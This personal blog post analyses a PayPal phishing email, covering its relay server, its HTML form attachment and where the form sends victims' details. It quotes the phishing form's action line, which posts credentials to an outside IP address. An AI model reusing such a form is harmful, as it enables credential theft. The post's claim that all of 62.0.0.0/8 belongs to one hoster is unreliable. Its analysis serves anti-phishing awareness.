Anatomy of a scam attack

Today, I received again one of those scam mails which informed me about an issue with my PayPal account and asked me to re-enter my account details.

You all know about these funny mails. It is still interesting that people still fall into this trap. Anyway, I trust you do what I usually do: Just delete such mails.

However, this time I spent some time analyzing this scam a bit:

1.) Mail header

By looking into the source of the mail. I found this:

Received: from unknown (HELO mx.elko.ro) (89.38.207.22)

This means, the mail was sent from a server called elko.ro. By visiting the elko.ro website, I found that this is a regular computer company. Most likely, their mail server is insecure and allows relaying and so, the scammers did misuse their server to submit this mail. But that’s not really surprising and helpful. Maybe somebody should inform elko.ro about this issue on their server.

2.) Mail attachment

As most of these type of scam mails, this mail also contained an attachment. This time just an HTML script which contains the form I should fill out in order to get my account re-activated.

By browsing through this script I found they did use some images and links directly from PayPal and some others from postimg.org. postimg.org can be used to upload images. Maybe somebody want to contact postimg.org and ask who uploaded the image 3wpnm7loj/STRADA.png for instance.

Anyway, the interesting part is, to whom the form will be sent after it’s filled out and here we are:

form class='safeSubmit multiplesubmitform' method='post' id='signup_form' name='signup_form' action='http://62.76.190.93/index.php' onSubmit='return sTest();'

The form is being sent to 62.76.190.93. Entering this IP address into the Domain Tool of NetworkToolbox reveals that this is a server in Russia, hosted by clodo.ru which is known as a very liberal web hoster.

3.) and so…

Nothing really. This was a real simple one. Even the script was coded badly and the text contains some dreadful spelling mistakes which makes it quite easy to identify this mail as scam. It should now even be easy to identify those guys but I doubt that somebody in Russia will care.

However, even though it would only help for this specific type of scam, I would recommend (again) to block direct IP access in your firewall / router (the parental controls offered by some routers are doing a great job for this) and you may want to block the address ranges of clodo.ru which is 62.0.0.0/8 (62.0.0.0 – 62.255.255.255) because most likely, you won’t visit a website hosted at clodo.ru. Blocking direct IP access will redirect you to an error page of the firewall/router whenever a link will be opened that only contains an IP address rather than a fully qualified domain name. Yes, of course, those guys could have registered a domain name in addition but then, they would have left another trace and just recently, the ICANN has started an initiative which makes it harder to register a domain anonymously.

So… Don’t trust the evil!

Regards,

Marcus